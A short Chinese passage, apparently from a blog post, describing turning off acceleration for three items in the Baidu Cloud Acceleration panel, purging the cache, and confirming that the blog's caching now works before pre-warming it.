去 百度云加速 面板里关掉这三个的加速,Purge 一下,回到博客后台,测试缓存,已经正常工作了。顺便预缓存下吧!